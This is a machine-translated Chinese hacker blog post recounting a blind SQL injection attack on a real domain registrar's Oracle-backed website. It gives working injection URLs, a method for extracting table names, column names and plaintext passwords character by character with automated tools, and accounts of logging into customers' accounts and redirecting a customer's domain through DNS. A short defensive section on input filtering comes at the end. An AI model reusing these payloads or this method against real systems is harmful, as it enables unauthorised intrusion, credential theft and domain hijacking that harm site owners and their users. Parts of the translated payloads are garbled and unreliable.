In fact, the hacker is the most important thing when attacking is the idea. I want everyone to say that I must be the best, the latest!
Wan Net's 尴尬 - Wan Net Oracle Inject Vulnerability Exposure
Some time ago, after the project in the hand, I was free to travel online. I saw a group of friends in the group that I said what to do something is open. Welcome everyone to play Download Dongdong, or the domain name of .com, .com.cn is very envious. When shrimp, I can have my own host and top domain name ... fantasy in the water ... Thinking of applying for host and domain name, I naturally think of China Wan Net (too famous in China ^ _ ^). Go to see it, see how many meters is to see the bottom. Just open the home page of Wanwang. Wow, a standard ASP.NET host has 1600 yuan a year ... a domain is 200. Just wanted to count, I saw the member login interface in the upper right corner of the homepage, usually doing safety habits, let me "thieves". Oh, let's see if you can find any loopholes, get a member, just pull, anyway, there is no matter.
Just turn it in the website, see: Wan Net (
Www.net.cn) is China's largest domain name and website managed service provider. It is the flagship of the Chinese Internet Service Industry. The system engineer, Cisco Router expert, Orcale database expert, Microsoft MCSE certified engineer, Java / ASP / Perl / C programming master and network security experts. Cough ... sweat. This security measures for this big website server I didn't know how N. Maybe a map, add N advanced IDS and FW, maybe it's also a honeypot waiting, the patch is willing to fight early. The tool to take out the port scan sweep ... depressed .... It seems that there is no hope from the server invading ...
Continue to turn, discover a situation, 嘿, 万 网 's site uses the ASP written. You must know that the ASP MSSQL's injection of ASP MSSQL, but a lot of sites have suffered. Do you have this problem with this big website? No matter, try it first. Find a link:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341
This is a page that purchases the virtual host, first test it with a classic and 1 = 1 and 1 = 2 method. I halo ~ all all return types do not match: 'CDBL' errors. Oh, is it really not good? Still don't worry, let's take a look at what database. Add a single quotes after the parameter, submit, the page returns an error:
ORAOLDB error '80004005'
ORA-01756: Strings in parentheses do not end correctly
/ HAS_CLIENT/BUY/VIR_HOST/vir_host1_sb.asp, line 285
Haha, it used to use oracle. No wonder. It is generally possible to have such a return error in the Oracle database. This is similar to what uncompromed quotes in MSSQL, but MSSQL appears such errors. We can almost certainly inject vulnerability, and Oracle is further confirmed.
I have a spirit and continue to make a further judgment. Note that the following steps are the basis for our future invasion, it is very important.
We will submit it separately:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'And 0 Hide (select count(* ) From all_tables and '1'== ' 1 http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FM% 20User_tables)% 20And% 20'1 '=' 1
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'And 0 Hide (select count(* ) FROM User_tab_columns ) and '1'== ' 1
These have been to see if there is any Oracle system table that we guess, but_tables, user_tables, and user_tab_columns. We will rely on these system tables in the future. If not, there is no way to play.
The page is all successfully returned, indicating that there is a speculated system table, and also explains the SQL statement we submit, and the program has processed. At this point, it also confirmed that this page did exist SQL injection vulnerability. Yeah!
After sending N-blocks to Wan Net without reacting, I started further penetration.
Below, we start formal injection. Of course, if the page of the system table is not returned to the page, most of us cannot succeed. ^ _ ^
First let us sort out the ideas. The most critical is the user's account information, and the most critical is the user's username and password. Our primary goal is this. How to locate this information in the Oracle database. Let's do this, the user_tab_columns stores all the column names of all user tables. We will start from here. submit:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'And 0 Hide (select count(- ) FROM USER_TAB_COLUMNS where Column_name like '% 25Password% 25 ')% 20AND% 20'1' = '1
Here is the list of column names that contain the Password string in the User_Tab_columns table.
The page returns correctly, haha, indicating that the column name is included in the PASSWORD string.
We can also test PWD, Admin, Pass, etc. sensitive fields. Here we start from password. I know that there is a column name containing the Password string. Then how do we know what table contains this column name? We do this, submit
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'And 0 Hide (select count(- ) FROM USER_TAB_COLUMNS where Column_name like '% 25Password% 25 '% 20And% 20Substr (Table_name, 1, 1) =' a ')% 20AND% 20'1' = '1
Here is what is the list of tables in the table that is started with A in the database is included in the database. If a page will return correctly. Otherwise, it will be reported: Microsoft VBScript runtime error error '800A000D'
Type mismatch: 'CDBL'
/ HAS_CLIENT/INCLUDE/VH_GETPROPERTY.ASP, line 46
Figure:
However, this one is really ... too tired ... 26 letters ....... Here I use the NBSI's background management address scan function to perform automatic detection. We do this:
The address of the NBSI's background management address scan is controlled by Dict_Admin.txt. We replace the contents of the document:
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20where_tab_columns% 20where% 20Column_name% 20Like% 20 '% 25Password% 25'% 20And% 20SUBSTR (Table_name, 1, 1) = 'A')% 20AND% 20'1 '=' 1
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20where_tab_columns% 20where% 20Column_name% 20Like% 20 '% 25Password% 25'% 20And% 20SUBSTR (Table_name, 1, 1) = 'B')% 20AND% 20'1 '=' 1
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20where_tab_columns% 20where% 20Column_name% 20Like% 20 '% 25Password% 25'% 20And% 20SUBSTR (Table_name, 1, 1) = 'C')% 20AND% 20'1 '=' 1
.
.
.
Then we fill in the scan address in the program.
Http://www.net.cn/has_client/buy/vir_host. Point start scanning. NBSI starts to help us with the address set by GET. There is a problem here, that is, 500 error NBSI will also display in the result bar below, and we only need it to display the address of 200 OK. How to do it? We took out our WPE PRO. WPE PRO is a tool that intercepts a modifying packet in real time. We use it to change the returned 500 error to 404 pages. The NBSI will not display this 500 error address below. WPE's specific usage, I will say it here, there is a tutorial on the Internet. Give a screenshot.
In this way, we can make us guess the efficiency improvement. This is the same.
By guess, we have gotten a sensitive field in a table that starts with C, D, H, M, S, and V. Let's see it one by one. Tired :)
Let's see C. There may be a lot of data sheets starting with C in the database. Which one is what we need. We continue to guess the second place. Put the content of DICT_ADMIN.TXT (hereinafter referred to as the admin) file with all the replacement functions:
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20where_tab_columns% 20where% 20Column_name% 20Like% 20 '% 25Password% 25'% 20And% 20SUBSTR (Table_name, 1, 2) = 'Ca')% 20And% 20'1 '=' 1VIR_HOST1_SB.ASP? Packageid = 10341'and% 200 <> (select% 20count (*)% 20FROM% 20User_tab_columns% 20where% 20Column_name% 20Like% 20 '% 25Password% 25 '% 20AND% 20Substr (Table_name, 1, 2) =' CB ')% 20And% 20'1' = '1
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20where_tab_columns% 20where% 20Column_name% 20Like% 20 '% 25Password% 25'% 20And% 20SUBSTR (Table_name, 1, 2) = 'Cc')% 20And% 20'1 '=' 1
.
.
.
Perform detection again. OK, get the first two characters we need to be CU. Then detect the third bit. . . This is cycled. Finally, it is obtained by customermst with CustomerMST including the sensitive column name. I saw Customer ... Hey, there is a play. Of course, you can submit it when you guess five characters.
http://www.net.cn/HAS_Client/buy/vir_host/vir_host1_SB.asp?PackageID=10341'and 0 <> (select count (*) from user_tables where table_name like '% 25XXXXX% 25' and length (table_name) = N) and '1' = '1
It is to determine how the length of the guessing table name is. This is more accurate and fast.
Guess the table name, you can submit:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?panageid=10341'and 0 <> (Select Count (*) from user_tables where table_name = 'customermst') and '1' = '1
To confirm. The page is correctly returned to OK. :)
Keep going. To now, we still don't know the specific column name. Let's start to guess the column name of the Customermst table. Since oracle does not have a direct violent field of "砰" as MSSQL, we can only guess, tired. . . Fortunately, you will lose a self-made NBSI WPE soil detector. . . * _ *. Gossip less, let's guess the column name, change the content of the admin file:
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20WHER_TAB_COLUMNS% 20where% 20table_name = 'Customermst'% 20And% 20Substr (Column_name, 1, 1) = 'a')% 20and % 20'1 '=' 1VIR_HOST1_SB.ASP? Packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20where_tab_columns% 20where% 20table_name = 'Customermst'% 20and% 20SUBSTR (Column_name, 1, 1) = 'B')% 20And% 20'1 '=' 1
Vir_host1_sb.asp? packageid = 10341'And% 200 <> (Select% 20count (*)% 20FROM% 20WHER_TAB_COLUMNS% 20WHERE% 20TABLE_NAME = 'Customermst'% 20and% 20SUBSTR (Column_Name, 1, 1) = 'c')% 20and % 20'1 '=' 1
.
.
.
Here is to see which letters starting in the Customermst table by guess. The page returns correctly, that is, return 200 ok, that is, it exists.
By detection, it is known that there is a column name that is starting with A, B, C, E, F, G, I, L, M, O, P, R, S, and U. I am dizzy, so much. . . No way, come slowly. Let's first look at the beginning:
The method here is similar to the method of guess the table name, and the content of the admin file is changed to:
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20WHER_TAB_COLUMNS% 20WHERE% 20TABLE_NAME = 'Customermst'% 20and% 20SUBSTR (Column_name, 1, 2) = 'aa')% 20and % 20'1 '=' 1
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FM% 20where_Tab_Columns% 20where% 20table_name = 'Customermst'% 20And% 20SUBSTR (Column_name, 1, 2) = 'AB')% 20and % 20'1 '=' 1
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20where_TAB_COLUMNS% 20where% 20table_name = 'Customermst'% 20and% 20SUBSTR (Column_name, 1, 2) = 'AC')% 20and % 20'1 '=' 1
.
.
.
OK, get the first two is Ar, continue. . . Finally, the name is Areaid. It is important to note that when one bit is detected, there may be multiple results, and there are multiple column names. For example, when detecting the second position in B, Bi and Bu have returned 200 OK, then it will explain that there is a column name starting with BI, BU. In this kind of push, we finally got all the column names in the Customermst table (rub the sweat ...): Areaid
Birthday
Bizid
Businessstatus
Channel_staffID
CityID
Contact
COUNTRY
Customerid
CustomerIndustry
Customerorigintype
Emailbackup
.
.
.
Password
.
.
.
UserID
.
.
Look at the name, you know that the three fields of Customerid, Password and Userid are the most important.
Wan Net is logged in with a digital ID and password when landing. So which of these two IDs is used to log in? We do this. To Wannang Home Log Box, you can check the ID with the method of the user's number ID. Yep. . . What is the name of the user? We don't know anything about the type of data. Turn it on the homepage and find that there is a new customer recommended section at the bottom. Look carefully, there is a real estate portal - SouFun
http://www.soufun.com/ Well, use the name of Soufun ~ ^ _ ^
OK, get the ID of the Soufun user is 10529112. Let's take a certainty of which field is the ID field. submit:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 (Built) (select count(- ) from customermst where customerid='10529112') 20AND% 20'1 '=' 1
Wow, the page is not returned correctly, returning an error. It seems not this field. Submit again:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 "(select count(- ) From CUSTOMERMST Where Userid='10529112' )% 20AND% 20'1 '=' 1
Ok, hey, this page is returned correctly. It seems that the userid field is the user login ID. The same method is detected that the Customerid field is the user name.
Field properties know, start guess password below, or use this admin user. Of course, still have a guess. I can finally guess the password, hehe. Not tired. Change the contents of admin files:
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20WHERE% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = 'a')% 20and % 20'1 '=' 1
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = 'b')% 20and % 20'1 '=' 1VIR_HOST1_SB.ASP? PackageId = 10341'and% 200 <> (Select% 20count (*)% 20WHERE% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = 'c')% 20And% 20'1 '=' 1
.
.
.
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = '0')% 20and % 20'1 '=' 1
Vir_host1_sb.asp? packageId = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = '1')% 20and % 20'1 '=' 1
Vir_host1_sb.asp? packageid = 10341'and% 200 <> (Select% 20count (*)% 20FROM% 20CUSTOMERMST% 20where% 20Userid = '10529112'% 20and% 20SUBSTR (Password, 1, 1) = '2')% 20and % 20'1 '=' 1
.
.
.
Here is a Arabic number, the password is usually a number of letters :). The above is the first place for the password of the user who is guessing the ID of 10529112. After a few seconds, the password is first in it, it is n. Continue to guess the second, method and the method of guessing the name, the same method, the only difference is that there will be no multiple results here. Finally, the password for the user who is 10529112 is n ****. I am dizzy, the password is not encrypted. . . Database and security experts. . . ?
Guess password, grace, come on the seseee, hehe.
Haha, landing OK! . . . The amount of available amount is actually -130 yuan ..., dizzy! Can you override? Deceive the feelings T_T. Not afraid! Find the field of money, Update! Hey ... Unfortunately I tried N times, I don't know how to correct Update and Insert, 5555555. Which master has a good way, everyone exchanges :)
Of course, there is all rights to this account after logging in. Let's take a look at the payment product management. ...... What is Dongdong, dizzy! Let's take a look at this user's financial information:
Well ... Open the most recent transaction. It was found that it turned 130 yuan to 10144167. Is 10144167 This account is rich? : P
I will break the password U ****** of 10144167, log in. Haha, it turned out to be a domain name distribution alliance partner, rich people ~ balance 329 ^ _ ^. Open the payment product management, then haha, so many domain names ~: p Open the domain name analysis of the page at the bottom of the page, Hoho found Chinese universal Domain Name Registration - Soufang.com. China. Click, come to SouFun.com. China's domain name resolution service page, here we can change SouFun.com. China's resolution to control domain names.
Speaking here, my mind is no longer gotting a member. Because this hazard is too big. Think about it, we get the user account and password, log in, you can easily change the pointing to the domain name purchased, pointing to our designated position. Imagine a malicious attacker, pointing a domain name of a business site to a fake site that refers to yourself, then the account information that the user logs in this business site is equal to no security. We visited the website of the domain name of the domain will all mess. For users who bought virtual host services, the harm is that the attacker can fully control the website through the website management system provided by Wanwang, this hazard does not have to be said.
For all the network, all its business may be affected. The data can be arbitrarily acquired tampering. I think there is no customer dare to apply for business, huh, huh.
For example, use the above to have a lot of domain names to make a demonstration. I want szsxmd.gd.cn to resolve this domain name to the famous
Www.xfocus.net security focus. First of all, I ping
Www.xfocus.net gets IP 202.106.127.50. Then, I entered the domain name parsing integrated business, add a record in the resolution service of Szsxmd.gd.cn, specifying the resolution IP 202.106.127.50. Figure:
After a few hours, the domain name resolution takes effect. When we reach SZSXMD.GD.cn, we will find that we come to the page of security focus :)
When ping szsxmd.gd.cn in the command line, the address resolution is 202.106.127.50 :)
Some of the other hazards are obvious, and it is relatively large, I will no longer do active demonstrations.
The database can be said to be the weight of a site. Through this injection vulnerability, we can fully control the data in the database, not light is information on user accounts, all of all data in the database, we can get, physical activity. In the case of an UTL_FILE permission to open a public group, it can also be used with UNION query to read files on the server, which is a bit similar to the Load_file () in PHP MySQL injection. Of course, you can also perform Update. Just injecting Oracle, I am still a rookie, I haven't updated inserted data and more advanced injection attacks. And Oracle's injection can only guess, and there is no automated tool. I use the NBSI's background scan function and WPE to improve efficiency. But I believe that the master is very much, the automated tool will also appear soon. ^ _ ^
Here, some statements used in some injection:
0 <> (Select Count (*) from all_tables) and '1' = '1 Guess whether there is a all_tables system table, confirm the injection
0 <> (Select Count (*) from user_tab_columns where colorn_name Like '% 25 column keyword% 25') and '1' = '1 Guess whether there is a column name that contains the definition keyword
0 <> (Select Count (*) from user_tab_columns where column_tab_columns where column_name Like '% 25 column keyword% 25' and substr (table_name, 1, 1) = 'a') and '1' = '1 Contains key column names Whether there is a table in the table. That is, a bit guess is started. 0 <> (Select Count (*) from user_tables where table_name limited% 25 'and length (table_name) = n) and' 1 '=' 1 Guess the length of the table containing the keyword
0 <> (Select Count (*) from user_tab_columns where table_name = 'Name' and substr (colorn_name, 1, 1) = 'a') and '1' = '1 guess list name
0 <> (Select Count (*) from the name where column name 1 = 'xxxxxxx' and substr (column name 2, 1, 1) = 'a') and '1' = '1 Guess data
So what is the principle of Oracle injection vulnerability? Here I will introduce it. Take this page we inject.
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341
The query statement in the source code of the ASP program may be:
Select * from table where packageId = '10341'
Because as an attacker that is a non-open source program, we have no way to know what the source code in the ASP program is likely to judge the approximate structure by returning error information. So I am a probably look.
Gossip less. Let's analyze. When we accessed this page, the ASP program queries data in the table table in the Table table according to the parameter 10341 submitted in the URL and returns it to us. From the situation we test, this parameter does not make filtering, put it in the query statement, which gives us a condition. When we submit
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 <> (Select Count (*) from all_tables) and '1' = '1. The query statement in the ASP program becomes this:
Select * from table where packageid = '10341' and 0 <> (Select Count (*) from all_tables) and '1' = '1'
This way we succeed in inserting the query statement we want to insert into the original query statement of the ASP program. This is different from the MSSQL, we can't use the symbol to comment out the following statement, the back and '1' = '1 is to match the number of quotes, so that the entire query statement is established and returned to the page. For example
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0 <> (Select Count (*) from all_tables) and '1' = '1' and 'x' = 'X The entire page is also normal returned ^ _ ^.
It is actually necessary to prevent this injection, as long as the parameters submitted in the URL are strictly filtered, remove some characters such as single quotes, SQL keywords, etc., should be, the attacker has no chance. Can the specific approach are in the URL submitted? The string behind, finds a single quotation mark, semicolon, SQL keyword, etc., etc., and immediately jump to a custom Error page. Personally think this is a better way. Especially for attackers from non-open source procedures, it is almost a road. Network security is multifaceted, and every link must be noted. You can use a chain to make a metaphor. If you have any questions in this chain, then the whole chain is broken. Just like this vulnerability of Wanwang, although it is just a small problem, it is very big, and it can easily change the Wanwang customer domain name pointing. If I point a lot of domain names to a certain site, then this site is equivalent to. So security on the Internet is not something or some people, but it is necessary for us to do well from top to bottom. In addition, since I have experienced a lot of worms, after the attack of the virus, everyone generally pays attention to the safety of their own servers. FW, IDS, and telecommunications are also involved in sealing some ports. Some sites have only opened 80. Then the security of the code running on the server is very important. A small end of a small place is likely to cause global collapse. Defense technology is constantly making progress, and the attack means is also constantly refurbished. Today, there is SQL injection, what will happen tomorrow? Always pay attention to the latest attack measures, I want to be very important for an excellent administrator. Unfortunately, there are no safety awareness when writing code, and the administrator just puts a written code on the server, and the server is safe (this is also like this, huh, huh), code writing loopholes It became a breakthrough. I have been paying attention to security from high school, and now I work in this area. It can be said that the current network is much more secure than before, but technology is progressing, today's security does not mean tomorrow's safety. Safety is an eternal topic. I personally feel that those worms, viruses are the most powerful weapons to strengthen the security awareness of the network management. I believe that using code defect attacks will also strengthen the safety awareness of programmers to write code. ^ _ ^
Finally, I hope that Wanke will solve this vulnerability. For experts, I want to solve this problem, maybe just 5 minutes. In addition, strengthen the data security of your own database, add a bimony. Also, your mail server is no problem? By the way, there are many sites in China, such as XX House, XX Department, etc.
Thank you for your patience to read my 文. Even levels are limited, if there is any mistake, you are welcome to correct, even MSN: War3apollo@hotmail.com. For the world outside, I will always be a rookie :).
